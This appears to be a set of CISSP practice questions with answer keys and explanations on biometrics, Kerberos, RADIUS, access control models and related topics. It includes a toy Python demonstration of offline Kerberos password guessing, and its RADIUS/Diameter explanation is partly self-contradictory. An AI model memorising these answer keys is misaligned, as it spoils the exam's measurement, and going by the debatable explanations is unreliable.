The reference mentioned above refers to authenticating the identity for access. So the distinction is being made that there is identity and there is authentication. In the case of physical security, the enrollment process is where the identity of the user would be validated, and then the biometric features provided by the user would authenticate the user on a one-to-one matching basis (for authentication) against the reference contained in the database of biometric templates. In the case of system access, the user might have to provide a username, a PIN, a passphrase, or a smart card, and then provide his biometric attributes.
Biometrics can also be used for identification purposes, where you do a one-to-many match. You take a facial scan of someone within an airport and you attempt to match it against a large database of known criminals and terrorists. This is how you could use biometrics for identification.
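To make the distinction between verification (one-to-one) and identification (one-to-many) more concrete, here is a minimal Python sketch. The template format, the compare() scoring function and the 0.8 threshold are hypothetical simplifications for illustration, not any vendor's actual matching algorithm.

# Illustrative only: biometric templates are modeled as plain feature vectors
# and similarity as an inverse distance; real systems use proprietary matchers.
def compare(template_a, template_b):
    # Hypothetical similarity score in [0, 1]; higher means more alike.
    distance = sum(abs(a - b) for a, b in zip(template_a, template_b))
    return 1.0 / (1.0 + distance)

THRESHOLD = 0.8  # assumed decision threshold

def verify(claimed_identity, live_template, enrolled_db):
    # One-to-one match: compare only against the claimed identity's template.
    return compare(live_template, enrolled_db[claimed_identity]) >= THRESHOLD

def identify(live_template, enrolled_db):
    # One-to-many match: search the whole database for the best candidate.
    best_id, best_score = None, 0.0
    for identity, template in enrolled_db.items():
        score = compare(live_template, template)
        if score > best_score:
            best_id, best_score = identity, score
    return best_id if best_score >= THRESHOLD else None

enrolled = {"alice": [0.1, 0.9, 0.4], "bob": [0.7, 0.2, 0.5]}
print(verify("alice", [0.1, 0.85, 0.45], enrolled))  # authentication (1:1) -> True
print(identify([0.68, 0.22, 0.5], enrolled))         # identification (1:N) -> "bob"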
There are always THREE means of authentication:
Something you know (Type 1)
Something you have (Type 2)
Something you are (Type 3)
Reference(s) used for this question:
TIPTON, Harold F. & KRAUSE, Micki, Information Security Management Handbook, 4th edition (volume 1) , 2000, CRC Press, Chapter 1, Biometric Identification (page 7).
and
Search Security at http://searchsecurity.techtarget.com/definition/masquerade
Which of the following biometric parameters are better suited for authentication use over a long period of time?
Iris pattern
Voice pattern
Signature dynamics
Retina pattern
The iris pattern is considered lifelong. Unique features of the iris are: freckles, rings, rifts, pits, striations, fibers, filaments, furrows, vasculature and coronas. Voice, signature and retina patterns are more likely to change over time, thus are not as suitable for authentication over a long period of time without needing re-enrollment.
Source: FERREL, Robert G, Questions and Answers for the CISSP Exam, domain 1 (derived from the Information Security Management Handbook, 4th Ed., by Tipton & Krause).
Which of the following classes is defined in the TCSEC (Orange Book) as discretionary protection?
C
B
A
D
In the TCSEC, Division C (classes C1 and C2) is defined as discretionary protection, Division B as mandatory protection, Division A as verified protection, and Division D as minimal protection.
Source: KRUTZ, Ronald L. & VINES, Russel D., The CISSP Prep Guide: Mastering the Ten Domains of Computer Security, page 197.
Also: THE source for all TCSEC "level" questions: http://csrc.nist.gov/publications/secpubs/rainbow/std001.txt
Password management falls into which control category?
Compensating
Detective
Preventive
Technical
Password management is an example of preventive control.
Proper passwords prevent unauthorized users from accessing a system.
There are literally hundreds of different access approaches, control methods, and technologies, both in the physical world and in the virtual electronic world. Each method addresses a different type of access control or a specific access need.
For example, access control solutions may incorporate identification and authentication mechanisms, filters, rules, rights, logging and monitoring, policy, and a plethora of other controls. However, despite the diversity of access control methods, all access control systems can be categorized into seven primary categories.
The seven main categories of access control are:
1. Directive: Controls designed to specify acceptable rules of behavior within an organization
2. Deterrent: Controls designed to discourage people from violating security directives
3. Preventive: Controls implemented to prevent a security incident or information breach
4. Compensating: Controls implemented to substitute for the loss of primary controls and mitigate risk down to an acceptable level
5. Detective: Controls designed to signal a warning when a security control has been breached
6. Corrective: Controls implemented to remedy circumstance, mitigate damage, or restore controls
7. Recovery: Controls implemented to restore conditions to normal after a security incident
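As a small illustration of how these seven categories might be applied, the following Python snippet maps a few example controls to their usual category; the category list comes from the text above, but the example controls are illustrative assumptions on my part.

# Hypothetical examples mapping common controls to the seven categories above.
CONTROL_CATEGORIES = {
    "acceptable use policy": "Directive",
    "warning banner": "Deterrent",
    "password management": "Preventive",
    "manual review while logging is down": "Compensating",
    "intrusion detection alert": "Detective",
    "patching a compromised host": "Corrective",
    "restoring from backup": "Recovery",
}

for control, category in CONTROL_CATEGORIES.items():
    print(f"{control} -> {category}")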
Reference(s) used for this question:
Hernandez CISSP, Steven (2012-12-21). Official (ISC)2 Guide to the CISSP CBK, Third Edition ((ISC)2 Press) (Kindle Locations 1156-1176). Auerbach Publications. Kindle Edition.
What is called the percentage of valid subjects that are falsely rejected by a Biometric Authentication system?
False Rejection Rate (FRR) or Type I Error
False Acceptance Rate (FAR) or Type II Error
Crossover Error Rate (CER)
True Rejection Rate (TRR) or Type III Error
The percentage of valid subjects that are falsely rejected is called the False Rejection Rate (FRR) or Type I Error.
Source: KRUTZ, Ronald L. & VINES, Russel D., The CISSP Prep Guide: Mastering the Ten Domains of Computer Security, 2001, John Wiley & Sons, Page 38.
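A minimal sketch of how FRR and FAR could be computed from raw test counts; the sample numbers below are made up purely for illustration.

# FRR (Type I error): valid subjects wrongly rejected / total valid attempts.
# FAR (Type II error): impostors wrongly accepted / total impostor attempts.
# The CER is the point where FRR and FAR are equal as sensitivity is tuned.
def false_rejection_rate(valid_attempts, false_rejections):
    return 100.0 * false_rejections / valid_attempts

def false_acceptance_rate(impostor_attempts, false_acceptances):
    return 100.0 * false_acceptances / impostor_attempts

# Hypothetical test data: 1000 genuine attempts, 1000 impostor attempts.
print(f"FRR = {false_rejection_rate(1000, 25):.1f}%")   # 2.5%
print(f"FAR = {false_acceptance_rate(1000, 10):.1f}%")  # 1.0%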
Which of the following remote access authentication systems is the most robust?
TACACS+
RADIUS
PAP
TACACS
TACACS+ is a proprietary Cisco enhancement to TACACS and is more robust than RADIUS. PAP is not a remote access authentication system but a remote node security protocol.
Source: KRUTZ, Ronald L. & VINES, Russel D., The CISSP Prep Guide: Mastering the Ten Domains of Computer Security, John Wiley & Sons, 2001, Chapter 3: Telecommunications and Network Security (page 122).
Which of the following access control models requires security clearance for subjects?
Identity-based access control
Role-based access control
Discretionary access control
Mandatory access control
With mandatory access control (MAC), the authorization of a subject's access to an object is dependent upon labels, which indicate the subject's clearance. Identity-based access control is a type of discretionary access control. Role-based access control is a type of non-discretionary access control.
Source: KRUTZ, Ronald L. & VINES, Russel D., The CISSP Prep Guide: Mastering the Ten Domains of Computer Security, John Wiley & Sons, 2001, Chapter 2: Access control systems (page 33).
Which security model introduces access to objects only through programs?
The Biba model
The Bell-LaPadula model
The Clark-Wilson model
The information flow model
In the Clark-Wilson model, the subject no longer has direct access to objects but instead must access them through programs (well-formed transactions).
The Clark–Wilson integrity model provides a foundation for specifying and analyzing an integrity policy for a computing system.
The model is primarily concerned with formalizing the notion of information integrity. Information integrity is maintained by preventing corruption of data items in a system due to either error or malicious intent. An integrity policy describes how the data items in the system should be kept valid from one state of the system to the next and specifies the capabilities of various principals in the system. The model defines enforcement rules and certification rules.
Clark–Wilson is more clearly applicable to business and industry processes in which the integrity of the information content is paramount at any level of classification.
Integrity goals of Clark–Wilson model:
Prevent unauthorized users from making modifications (only this goal is also addressed by the Biba model).
Separation of duties prevents authorized users from making improper modifications.
Well-formed transactions: maintain internal and external consistency, i.e., a series of operations carried out to take the data from one consistent state to another.
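A minimal sketch of the "access only through programs" idea described above: subjects never modify constrained data items directly; they invoke a well-formed transaction (transformation procedure) certified to keep the data consistent. The class names and the sample balance-transfer rule are illustrative assumptions, not part of the formal model.

class Account:
    """Constrained data item (CDI): the balance must never go negative."""
    def __init__(self, balance):
        self._balance = balance  # not meant to be modified directly by subjects

def transfer(source, destination, amount):
    """Well-formed transaction (TP): moves money while preserving integrity."""
    if amount <= 0 or source._balance < amount:
        raise ValueError("transaction would violate the integrity policy")
    source._balance -= amount
    destination._balance += amount

# Subjects are only authorized to call certified TPs such as transfer();
# they are not given direct write access to Account balances.
a, b = Account(100), Account(0)
transfer(a, b, 40)
print(a._balance, b._balance)  # 60 40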
The following are incorrect answers:
The Biba model is incorrect. The Biba model is concerned with integrity and controls access to objects based on a comparison of the security level of the subject to that of the object.
The Bell-LaPadula model is incorrect. The Bell-LaPadula model is concerned with confidentiality and controls access to objects based on a comparison of the clearance level of the subject to the classification level of the object.
The information flow model is incorrect. The information flow model uses a lattice where objects are labelled with security classes and information can flow either upward or at the same level. It is similar in framework to the Bell-LaPadula model.
References:
ISC2 Official Study Guide, Pages 325 - 327
AIO3, pp. 284 - 287
AIOv4 Security Architecture and Design (pages 338 - 342)
AIOv5 Security Architecture and Design (pages 341 - 344)
Wikipedia at: https://en.wikipedia.org/wiki/Clark-Wilson_model
Which of the following is most relevant to determining the maximum effective cost of access control?
the value of information that is protected
management's perceptions regarding data importance
budget planning related to base versus incremental spending.
the cost to replace lost data
The cost of access control must be commensurate with the value of the information that is being protected.
Source: KRUTZ, Ronald L. & VINES, Russel D., The CISSP Prep Guide: Mastering the Ten Domains of Computer Security, 2001, John Wiley & Sons, Page 49.
Which of the following statements pertaining to using Kerberos without any extension is false?
A client can be impersonated by password-guessing.
Kerberos is mostly a third-party authentication protocol.
Kerberos uses public key cryptography.
Kerberos provides robust authentication.
Kerberos is a trusted, credential-based, third-party authentication protocol that uses symmetric (secret) key cryptography to provide robust authentication to clients accessing services on a network.
Because a client's password is used in the initiation of the Kerberos request for the service protocol, password guessing can be used to impersonate a client.
Here is a nice overview of HOW Kerberos is implemented, as described in RFC 4556:
1. Introduction
The Kerberos V5 protocol [RFC4120] involves use of a trusted third
party known as the Key Distribution Center (KDC) to negotiate shared
session keys between clients and services and provide mutual
authentication between them.
The corner-stones of Kerberos V5 are the Ticket and the
Authenticator. A Ticket encapsulates a symmetric key (the ticket
session key) in an envelope (a public message) intended for a
specific service. The contents of the Ticket are encrypted with a
symmetric key shared between the service principal and the issuing
KDC. The encrypted part of the Ticket contains the client principal
name, among other items. An Authenticator is a record that can be
shown to have been recently generated using the ticket session key in
the associated Ticket. The ticket session key is known by the client
who requested the ticket. The contents of the Authenticator are
encrypted with the associated ticket session key. The encrypted part
of an Authenticator contains a timestamp and the client principal
name, among other items.
As shown in Figure 1, below, the Kerberos V5 protocol consists of the
following message exchanges between the client and the KDC, and the
client and the application service:
The Authentication Service (AS) Exchange
The client obtains an "initial" ticket from the Kerberos
authentication server (AS), typically a Ticket Granting Ticket
(TGT). The AS-REQ message and the AS-REP message are the request
and the reply message, respectively, between the client and the
AS.
The Ticket Granting Service (TGS) Exchange
The client subsequently uses the TGT to authenticate and request a
service ticket for a particular service, from the Kerberos
ticket-granting server (TGS). The TGS-REQ message and the TGS-REP
message are the request and the reply message respectively between
the client and the TGS.
The Client/Server Authentication Protocol (AP) Exchange
The client then makes a request with an AP-REQ message, consisting
of a service ticket and an authenticator that certifies the
client's possession of the ticket session key. The server may
optionally reply with an AP-REP message. AP exchanges typically
negotiate session-specific symmetric keys.
Usually, the AS and TGS are integrated in a single device also known
as the KDC.
+--------------+
+--------->| KDC |
AS-REQ / +-------| |
/ / +--------------+
/ / ^ |
/ |AS-REP / |
| | / TGS-REQ + TGS-REP
| | / /
| | / /
| | / +---------+
| | / /
| | / /
| | / /
| v / v
++-------+------+ +-----------------+
| Client +------------>| Application |
| | AP-REQ | Server |
| |<------------| |
+---------------+ AP-REP +-----------------+
Figure 1: The Message Exchanges in the Kerberos V5 Protocol
In the AS exchange, the KDC reply contains the ticket session key,
among other items, that is encrypted using a key (the AS reply key)
shared between the client and the KDC. The AS reply key is typically
derived from the client's password for human users. Therefore, for
human users, the attack resistance strength of the Kerberos protocol
is no stronger than the strength of their passwords.
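The last paragraph of the excerpt above is why password guessing works against Kerberos without extensions: the AS reply key is derived only from the password and a publicly known salt, so an attacker who captures material protected by that key can test candidate passwords offline. The sketch below is a loose illustration using PBKDF2 from Python's standard library; the real Kerberos string-to-key functions are defined in RFC 3961/3962 and differ in detail, and the realm, principal and passwords shown are invented.

import hashlib

def derive_reply_key(password, realm, principal):
    # Simplified stand-in for a Kerberos string-to-key function: the real
    # algorithms differ, but are likewise seeded only by the password and a
    # publicly known salt (typically realm + principal).
    salt = (realm + principal).encode()
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 10000)

captured_key = derive_reply_key("Winter2024!", "EXAMPLE.COM", "alice")

# Offline guessing: the attacker simply replays the derivation for each guess
# and checks it against the captured AS-REP material.
for guess in ["password", "letmein", "Winter2024!"]:
    if derive_reply_key(guess, "EXAMPLE.COM", "alice") == captured_key:
        print("password recovered:", guess)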
Source: KRUTZ, Ronald L. & VINES, Russel D., The CISSP Prep Guide: Mastering the Ten Domains of Computer Security, John Wiley & Sons, 2001, Chapter 2: Access control systems (page 40).
And
HARRIS, Shon, All-In-One CISSP Certification Exam Guide, McGraw-Hill/Osborne, 2002, chapter 4: Access Control (pages 147-151).
and
http://www.ietf.org/rfc/rfc4556.txt
What is Kerberos?
A three-headed dog from Egyptian mythology.
A trusted third-party authentication protocol.
A security model.
A remote authentication dial in user server.
A trusted third-party authentication protocol. Is correct because that is exactly what Kerberos is.
The following answers are incorrect:
A three-headed dog from Egyptian mythology. Is incorrect because the three-headed dog Kerberos (Cerberus) comes from Greek mythology, not Egyptian mythology.
A security model. Is incorrect because Kerberos is an authentication protocol and not just a security model.
A remote authentication dial in user server. Is incorrect because Kerberos is not a remote authentication dial-in user service; that would be RADIUS.
What refers to legitimate users accessing networked services that would normally be restricted to them?
Spoofing
Piggybacking
Eavesdropping
Logon abuse
Unauthorized access of restricted network services by the circumvention of security access controls is known as logon abuse. This type of abuse refers to users who may be internal to the network but who access resources they would not normally be allowed to use.
Source: KRUTZ, Ronald L. & VINES, Russel D., The CISSP Prep Guide: Mastering the Ten Domains of Computer Security, John Wiley & Sons, 2001, Chapter 3: Telecommunications and Network Security (page 74).
Which of the following is most affected by denial-of-service (DOS) attacks?
Confidentiality
Integrity
Accountability
Availability
Denial of service attacks obviously affect availability of targeted systems.
Source: KRUTZ, Ronald L. & VINES, Russel D., The CISSP Prep Guide: Mastering the Ten Domains of Computer Security, John Wiley & Sons, 2001, Chapter 3: Telecommunications and Network Security (page 61).
The type of discretionary access control (DAC) that is based on an individual's identity is also called:
Identity-based Access control
Rule-based Access control
Non-Discretionary Access Control
Lattice-based Access control
An identity-based access control is a type of Discretionary Access Control (DAC) that is based on an individual's identity.
DAC is suited to low-security environments. The owner of the file decides who has access to the file.
If a user creates a file, he is the owner of that file. An identifier for this user is placed in the file header and/or in an access control matrix within the operating system.
Ownership might also be granted to a specific individual. For example, a manager for a certain department might be made the owner of the files and resources within her department. A system that uses discretionary access control (DAC) enables the owner of the resource to specify which subjects can access specific resources.
This model is called discretionary because the control of access is based on the discretion of the owner. Many times department managers, or business unit managers, are the owners of the data within their specific department. Being the owner, they can specify who should have access and who should not.
Reference(s) used for this question:
Harris, Shon (2012-10-18). CISSP All-in-One Exam Guide, 6th Edition (p. 220). McGraw-Hill . Kindle Edition.
RADIUS incorporates which of the following services?
Authentication server and PIN codes.
Authentication of clients and static passwords generation.
Authentication of clients and dynamic passwords generation.
Authentication server as well as support for Static and Dynamic passwords.
A Network Access Server (NAS) operates as a client of RADIUS. The client is responsible for passing user information to designated RADIUS servers, and then acting on the response which is returned.
RADIUS servers are responsible for receiving user connection requests, authenticating the user, and then returning all configuration information necessary for the client to deliver service to the user.
RADIUS authentication is based on provisions of simple username/password credentials. These credentials are encrypted by the client using a shared secret between the client and the RADIUS server. (OIG 2007, Page 513)
RADIUS incorporates an authentication server and can make use of both dynamic and static passwords.
Since it uses the PAP and CHAP protocols, it also includes support for static passwords.
RADIUS is an Internet protocol. RADIUS carries authentication, authorization, and configuration information between a Network Access Server and a shared Authentication Server. RADIUS features and functions are described primarily in the IETF (Internet Engineering Task Force) document RFC 2138.
The term "RADIUS" is an acronym which stands for Remote Authentication Dial In User Service.
The main advantage to using a RADIUS approach to authentication is that it can provide a stronger form of authentication. RADIUS is capable of using a strong, two-factor form of authentication, in which users need to possess both a user ID and a hardware or software token to gain access.
Token-based schemes use dynamic passwords. Every minute or so, the token generates a unique 4-, 6- or 8-digit access number that is synchronized with the security server. To gain entry into the system, the user must generate both this one-time number and provide his or her user ID and password.
Although protocols such as RADIUS cannot protect against theft of an authenticated session via some realtime attacks, such as wiretapping, using unique, unpredictable authentication requests can protect against a wide range of active attacks.
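A minimal sketch of the time-synchronized token scheme described above: both the token and the security server derive the same short code from a shared secret and the current time window. The 30-second window, HMAC-SHA1 and 6-digit truncation below are illustrative choices roughly in the spirit of TOTP, not the algorithm of any particular vendor's token, and the seed value is invented.

import hmac, hashlib, struct, time

def one_time_code(shared_secret: bytes, when=None, window=30, digits=6):
    # Both sides compute a counter from the current time window, then truncate
    # an HMAC of that counter to a short numeric code.
    counter = int((when if when is not None else time.time()) // window)
    mac = hmac.new(shared_secret, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = mac[-1] & 0x0F
    value = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(value % (10 ** digits)).zfill(digits)

secret = b"token-seed-shared-with-the-server"  # hypothetical seed
print(one_time_code(secret))  # the user submits this plus their user ID/PIN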
RADIUS: Key Features and Benefits
Feature: RADIUS supports dynamic passwords and challenge/response passwords.
Benefit: Improved system security, because passwords are not static; it is much more difficult for a bogus host to spoof users into giving up their passwords or password-generation algorithms.
Feature: RADIUS allows the user to have a single user ID and password for all computers in a network.
Benefit: Improved usability, because the user has to remember only one login combination.
Feature: RADIUS is able to:
- Prevent RADIUS users from logging in via login (or ftp);
- Require them to log in via login (or ftp);
- Require them to log in to a specific network access server (NAS);
- Control access by time of day.
Benefit: Provides very granular control over the types of logins allowed, on a per-user basis.
Feature: The time-out interval for failing over from an unresponsive primary RADIUS server to a backup RADIUS server is site-configurable.
Benefit: RADIUS gives the system administrator more flexibility in managing which users can log in from which hosts or devices.
Stratus Technology Product Brief
http://www.stratus.com/products/vos/openvos/radius.htm
Source: KRUTZ, Ronald L. & VINES, Russel D., The CISSP Prep Guide: Mastering the Ten Domains of Computer Security, 2001, John Wiley & Sons, Pages 43, 44.
Also check: MILLER, Lawrence & GREGORY, Peter, CISSP for Dummies, 2002, Wiley Publishing, Inc., pages 45-46.
How are memory cards and smart cards different?
Memory cards normally hold more memory than smart cards
Smart cards provide a two-factor authentication whereas memory cards don't
Memory cards have no processing power
Only smart cards can be used for ATM cards
The main difference between memory cards and smart cards is their capacity to process information. A memory card holds information but cannot process information. A smart card holds information and has the necessary hardware and software to actually process that information.
A memory card holds a user's authentication information, so that the user needs only to type in a user ID or PIN and present the memory card to the system. If the entered information and the stored information match and are approved by an authentication service, the user is successfully authenticated.
A common example of a memory card is a swipe card used to provide entry to a building. The user enters a PIN and swipes the memory card through a card reader. If this is the correct combination, the reader flashes green and the individual can open the door and enter the building.
Memory cards can also be used with computers, but they require a reader to process the information. The reader adds cost to the process, especially when one is needed for every computer. Additionally, PIN and card generation add overhead and complexity to the whole authentication process. However, a memory card provides a more secure authentication method than using only a password, because the attacker would need to obtain the card and know the correct PIN.
Administrators and management need to weigh the costs and benefits of a memory card implementation as well as the security needs of the organization to determine if it is the right authentication mechanism for their environment.
One of the most prevalent weaknesses of memory cards is that data stored on the card are not protected. Unencrypted data on the card (or stored on the magnetic strip) can be extracted or copied. Unlike a smart card, where security controls and logic are embedded in the integrated circuit, memory cards do not employ an inherent mechanism to protect the data from exposure.
Very little trust can be associated with confidentiality and integrity of information on the memory cards.
The following answers are incorrect:
"Smart cards provide two-factor authentication whereas memory cards don't" is incorrect. This is not necessarily true. A memory card can be combined with a pin or password to offer two factors authentication where something you have and something you know are used for factors.
"Memory cards normally hold more memory than smart cards" is incorrect. While a memory card may or may not have more memory than a smart card, this is certainly not the best answer to the question.
"Only smart cards can be used for ATM cards" is incorrect. This depends on the decisions made by the particular institution and is not the best answer to the question.
Reference(s) used for this question:
Shon Harris, CISSP All In One, 6th edition , Access Control, Page 199 and also for people using the Kindle edition of the book you can look at Locations 4647-4650.
Schneiter, Andrew (2013-04-15). Official (ISC)2 Guide to the CISSP CBK, Third Edition : Access Control ((ISC)2 Press) (Kindle Locations 2124-2139). Auerbach Publications. Kindle Edition.
In addition to the accuracy of the biometric systems, there are other factors that must also be considered:
These factors include the enrollment time and the throughput rate, but not acceptability.
These factors do not include the enrollment time, the throughput rate, and acceptability.
These factors include the enrollment time, the throughput rate, and acceptability.
These factors include the enrollment time, but not the throughput rate, neither the acceptability.
In addition to the accuracy of the biometric systems, there are other factors that must also be considered.
These factors include the enrollment time, the throughput rate, and acceptability.
Enrollment time is the time it takes to initially "register" with a system by providing samples of the biometric characteristic to be evaluated. An acceptable enrollment time is around two minutes.
For example, in fingerprint systems, the actual fingerprint is stored and requires approximately 250kb per finger for a high quality image. This level of information is required for one-to-many searches in forensics applications on very large databases.
In finger-scan technology, a full fingerprint is not stored-the features extracted from this fingerprint are stored using a small template that requires approximately 500 to 1000 bytes of storage. The original fingerprint cannot be reconstructed from this template.
Updates of the enrollment information may be required because some biometric characteristics, such as voice and signature, may change with time.
Source: KRUTZ, Ronald L. & VINES, Russel D., The CISSP Prep Guide: Mastering the Ten Domains of Computer Security, 2001, John Wiley & Sons, Page 37 & 38.
Which of the following statements pertaining to RADIUS is incorrect:
A RADIUS server can act as a proxy server, forwarding client requests to other authentication domains.
Most RADIUS clients have a capability to query secondary RADIUS servers for redundancy.
Most RADIUS servers have built-in database connectivity for billing and reporting purposes.
Most RADIUS servers can work with DIAMETER servers.
"Most RADIUS servers can work with DIAMETER servers" is the correct answer because the statement is FALSE.
Diameter is an AAA protocol, AAA stands for authentication, authorization and accounting protocol for computer networks, and it is a successor to RADIUS.
The name is a pun on the RADIUS protocol, which is the predecessor (a diameter is twice the radius).
The main differences are as follows:
Reliable transport protocols (TCP or SCTP, not UDP)
The IETF is in the process of standardizing TCP Transport for RADIUS
Network or transport layer security (IPsec or TLS)
The IETF is in the process of standardizing Transport Layer Security for RADIUS
Transition support for RADIUS, although Diameter is not fully compatible with RADIUS
Larger address space for attribute-value pairs (AVPs) and identifiers (32 bits instead of 8 bits)
Client–server protocol, with exception of supporting some server-initiated messages as well
Both stateful and stateless models can be used
Dynamic discovery of peers (using DNS SRV and NAPTR)
Capability negotiation
Supports application layer acknowledgements, defines failover methods and state machines (RFC 3539)
Error notification
Better roaming support
More easily extended; new commands and attributes can be defined
Aligned on 32-bit boundaries
Basic support for user-sessions and accounting
A Diameter Application is not a software application, but a protocol based on the Diameter base protocol (defined in RFC 3588). Each application is defined by an application identifier and can add new command codes and/or new mandatory AVPs. Adding a new optional AVP does not require a new application.
Examples of Diameter applications:
Diameter Mobile IPv4 Application (MobileIP, RFC 4004)
Diameter Network Access Server Application (NASREQ, RFC 4005)
Diameter Extensible Authentication Protocol (EAP) Application (RFC 4072)
Diameter Credit-Control Application (DCCA, RFC 4006)
Diameter Session Initiation Protocol Application (RFC 4740)
Various applications in the 3GPP IP Multimedia Subsystem
All of the other choices presented are true. So Diameter is backward compatible with RADIUS (to some extent), but the opposite is false.
Reference(s) used for this question:
TIPTON, Harold F. & KRAUSE, MICKI, Information Security Management Handbook, 4th Edition, Volume 2, 2001, CRC Press, NY, Page 38.
and
https://secure.wikimedia.org/wikipedia/en/wiki/Diameter_%28protocol%29
What does the simple security (ss) property mean in the Bell-LaPadula model?
No read up
No write down
No read down
No write up
The ss (simple security) property of the Bell-LaPadula access control model states that reading of information by a subject at a lower sensitivity level from an object at a higher sensitivity level is not permitted (no read up).
Source: KRUTZ, Ronald L. & VINES, Russel D., The CISSP Prep Guide: Mastering the Ten Domains of Computer Security, John Wiley & Sons, 2001, Chapter 5: Security Architectures and Models (page 202).
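A minimal sketch of the simple security property, assuming a simple ordered set of sensitivity levels; the level names and the policy check are illustrative, not a full Bell-LaPadula implementation.

# Ordered sensitivity levels, lowest to highest.
LEVELS = {"UNCLASSIFIED": 0, "CONFIDENTIAL": 1, "SECRET": 2, "TOP SECRET": 3}

def can_read(subject_clearance, object_classification):
    # Simple security (ss) property: reading is allowed only if the subject's
    # clearance dominates the object's classification -- "no read up".
    return LEVELS[subject_clearance] >= LEVELS[object_classification]

print(can_read("SECRET", "CONFIDENTIAL"))  # True  (reading down or at the same level is allowed)
print(can_read("SECRET", "TOP SECRET"))    # False (no read up)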
What is a common problem when using vibration detection devices for perimeter control?
They are vulnerable to non-adversarial disturbances.
They can be defeated by electronic means.
Signal amplitude is affected by weather conditions.
They must be buried below the frost line.
Vibration sensors are similar and are also implemented to detect forced entry. Financial institutions may choose to implement these types of sensors on exterior walls, where bank robbers may attempt to drive a vehicle through. They are also commonly used around the ceiling and flooring of vaults to detect someone trying to make an unauthorized bank withdrawal.
Such sensors are prone to false positives. A large truck with heavy equipment driving by may trigger the sensor, and so may a storm with thunder and lightning, even though there is no adversarial threat or disturbance.
The following are incorrect answers:
All of the other choices are incorrect.
Reference used for this question:
Harris, Shon (2012-10-18). CISSP All-in-One Exam Guide, 6th Edition (pp. 495-496). McGraw-Hill . Kindle Edition.
In regards to information classification what is the main responsibility of information (data) owner?
determining the data sensitivity or classification level
running regular data backups
audit the data users
periodically check the validity and accuracy of the data
Making the determination to decide what level of classification the information requires is the main responsibility of the data owner.
The data owner within classification is a person from management who has been entrusted with a data set that belongs to the company. It could be, for example, the Chief Financial Officer (CFO) who has been entrusted with all financial data, or it could be the Human Resources Director who has been entrusted with all Human Resources data. The information owner will decide what classification will be applied to the data based on confidentiality, integrity, availability, criticality, and sensitivity of the data.
The Custodian is the technical person who will implement the proper classification on objects in accordance with the Data Owner. The custodian DOES NOT decide what classification to apply, it is the Data Owner who will dictate to the Custodian what is the classification to apply.
NOTE:
The term Data Owner is also used within Discretionary Access Control (DAC). Within DAC it means the person who has created an object. For example, if I create a file on my system then I am the owner of the file and I can decide who else could get access to the file. It is left to my discretion. Within DAC access is granted based solely on the Identity of the subject, this is why sometimes DAC is referred to as Identity Based Access Control.
The other choices were not the best answers:
Running regular backups is the responsibility of the custodian.
Auditing the data users is the responsibility of the auditors.
Periodically checking the validity and accuracy of the data is not one of the data owner's responsibilities.
Reference(s) used for this question:
KRUTZ, Ronald L. & VINES, Russel D., The CISSP Prep Guide: Mastering the Ten Domains of Computer Security, John Wiley & Sons, 2001, Page 14, Chapter 1: Security Management Practices.
In non-discretionary access control using Role Based Access Control (RBAC), a central authority determines what subjects can have access to certain objects based on the organizational security policy. The access controls may be based on:
The society's role in the organization
The individual's role in the organization
The group-dynamics as they relate to the individual's role in the organization
The group-dynamics as they relate to the master-slave role in the organization
In Non-Discretionary Access Control, when Role Based Access Control is being used, a central authority determines what subjects can have access to certain objects based on the organizational security policy. The access controls may be based on the individual's role in the organization.
Reference(S) used for this question:
KRUTZ, Ronald L. & VINES, Russel D., The CISSP Prep Guide: Mastering the Ten Domains of Computer Security, 2001, John Wiley & Sons, Page 33.
What is the PRIMARY use of a password?
Allow access to files.
Identify the user.
Authenticate the user.
Segregate various user's accesses.
The PRIMARY use of a password is to authenticate the user; identification is provided by the user ID.
Source: TIPTON, Hal, (ISC)2, Introduction to the CISSP Exam presentation.
Which of the following is true of network security?
A firewall is a not a necessity in today's connected world.
A firewall is a necessity in today's connected world.
A whitewall is a necessity in today's connected world.
A black firewall is a necessity in today's connected world.
Commercial firewalls are a dime a dozen in today's world. "Black firewall" and "whitewall" are just distractors.
Asynchronous Communication transfers data by sending:
bits of data sequentially
bits of data sequentially in irregular timing patterns
bits of data in sync with a heartbeat or clock
bits of data simultaneously
Asynchronous communication transfers data by sending bits of data sequentially in irregular timing patterns.
In asynchronous transmission each character is transmitted separately, that is, one character at a time. The character is preceded by a start bit, which tells the receiving end where the character coding begins, and is followed by a stop bit, which tells the receiver where the character coding ends. There will be intervals of idle time on the channel, shown as gaps. Thus there can be gaps between two adjacent characters in the asynchronous communication scheme. In this scheme, the bits within the character frame (including start, parity and stop bits) are sent at the baud rate.
The start bit and stop bit, together with the gaps, allow the receiving and sending computers to synchronise the data transmission. Asynchronous communication is used when slow-speed peripherals communicate with the computer. The main disadvantage of asynchronous communication is slow transmission speed. Asynchronous communication, however, does not require the complex and costly hardware that is required for synchronous transmission.
Asynchronous communication is transmission of data without the use of an external clock signal. Any timing required to recover data from the communication symbols is encoded within the symbols. The most significant aspect of asynchronous communications is variable bit rate, or that the transmitter and receiver clock generators do not have to be exactly synchronized.
The asynchronous communication technique is a physical layer transmission technique which is most widely used for personal computers providing connectivity to printers, modems, fax machines, etc.
An asynchronous link communicates data as a series of characters of fixed size and format. Each character is preceded by a start bit and followed by 1-2 stop bits.
Parity is often added to provide some limited protection against errors occurring on the link.
The use of independent transmit and receive clocks constrains transmission to relatively short characters (<8 bits) and moderate data rates (< 64 kbps, but typically lower).
The asynchronous transmitter delimits each character by a start sequence and a stop sequence. The start bit (0), data (usually 8 bits plus parity) and stop bit(s) (1) are transmitted using a shift register clocked at the nominal data rate.
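A minimal sketch of the framing just described: one character is wrapped with a start bit, optional parity, and a stop bit. The LSB-first bit ordering and even parity below are illustrative assumptions; real UART settings vary.

def frame_character(byte_value, use_parity=True):
    # Start bit (0), 8 data bits LSB first, optional even parity, stop bit (1).
    data_bits = [(byte_value >> i) & 1 for i in range(8)]
    bits = [0] + data_bits
    if use_parity:
        bits.append(sum(data_bits) % 2)  # even parity bit
    bits.append(1)                       # stop bit
    return bits

# 'A' (0x41) framed for asynchronous transmission; idle gaps (line held at the
# stop-bit level) may separate consecutive framed characters.
print(frame_character(ord("A")))  # [0, 1, 0, 0, 0, 0, 0, 1, 0, 0, 1]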
When asynchronous transmission is used to support packet data links (e.g. IP), then special characters have to be used ("framing") to indicate the start and end of each frame transmitted.
